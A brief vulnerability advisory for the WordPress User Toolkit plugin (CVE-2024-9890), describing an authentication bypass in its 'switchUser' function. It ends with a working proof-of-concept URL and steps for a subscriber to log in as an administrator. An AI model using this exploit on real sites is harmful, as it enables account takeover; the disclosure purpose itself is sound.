User Toolkit <= 1.2.3 - 已验证(订阅者及以上)身份验证绕过
WordPress的User Toolkit插件在1.2.3及以下版本中存在身份验证绕过漏洞。这是由于'switchUser'函数中的权限检查不当所致。这使得经过身份验证的攻击者(具有订阅者及以上权限)能够以网站上的任何现有用户(例如管理员)身份登录。
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
Login as your user. view-source your provfile page to grag the nonce value. change the user_from value to your user id change the user_id to the id of the admin Done!